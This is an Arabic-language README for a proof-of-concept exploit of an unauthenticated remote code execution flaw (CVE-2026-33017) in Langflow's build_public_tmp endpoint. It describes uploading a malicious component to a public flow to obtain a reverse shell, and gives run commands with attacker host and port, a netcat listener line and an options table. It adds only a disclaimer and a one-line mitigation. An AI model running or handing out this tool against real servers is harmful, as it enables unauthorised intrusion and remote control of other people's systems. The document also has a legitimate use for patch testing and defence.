
CVE-2026-33017 Langflow RCE PoC
إثبات مفهوم (PoC) لثغرة تنفيذ التعليمات البرمجية دون مصادقة عبر build_public_tmp في Langflow.
يقوم برفع مكوّن خبيث إلى تدفّق عام، ويشغّل البناء، ويلتقط قشرة عكسية.
لأغراض اختبار الأمان المصرَّح به فقط. استخدمه فقط ضد الأنظمة التي تملكها أو لديك إذن صريح لاختبارها.
requests (pip install requests)شغّل المستمع المدمج وأطلِق الاستغلال دفعة واحدة:
python3 poc.py \
--url https://target:7860 \
--flow-id <public-flow-uuid> \
--lhost <your-ip> \
--lport 4444 \
--listen
عندما تتصل القشرة، تحاول تلقائيًا الترقية إلى قشرة تفاعلية بالكامل.
إذا كنت تفضّل استخدام مستمع خاص بك (مثل nc -lvnp 4444)، فاحذف --listen:
python3 poc.py --url https://target:7860 --flow-id <uuid> --lhost <your-ip> --lport 4444
CVE-2026-33017 هي ثغرة تنفيذ تعليمات برمجية عن بُعد (RCE) دون مصادقة في نقطة النهاية POST /api/v1/build_public_tmp/{flow_id}/flow
الخاصة بـ Langflow، والتي تنفّذ كود Python المقدَّم من المهاجم من تعريفات عقد التدفق دون عزل (sandboxing). لمعرفة المزيد، اطّلع على الموارد أدناه:
إجراءات التخفيف من تقرير أبحاث التهديدات الصادر عن Sysdig:
/api/v1/build_public_tmp أو عطّل بناء التدفقات العامة بالكامل.تُوفَّر هذه الأداة لأغراض البحث واختبار الاختراق المصرَّح به. لا يتحمّل المؤلف أي مسؤولية عن إساءة الاستخدام أو الأضرار.
| الخيار | الوصف |
|---|
--url | عنوان خادم Langflow المستهدف (مطلوب) |
--flow-id | UUID للتدفق العام المشترك (مطلوب) |
--lhost | عنوان IP لاستدعاء القشرة العكسية (مطلوب) |
--lport | منفذ استدعاء القشرة العكسية (مطلوب) |
--listen | تشغيل المستمع المدمج |
--timeout | مهلة طلب HTTP بالثواني (الافتراضي 30) |
-k, --insecure | تعطيل التحقق من شهادة TLS (الشهادات ذاتية التوقيع / منتهية الصلاحية) |
--no-upgrade | تخطّي ترقية TTY التلقائية، واستخدام قشرة أسطر أساسية |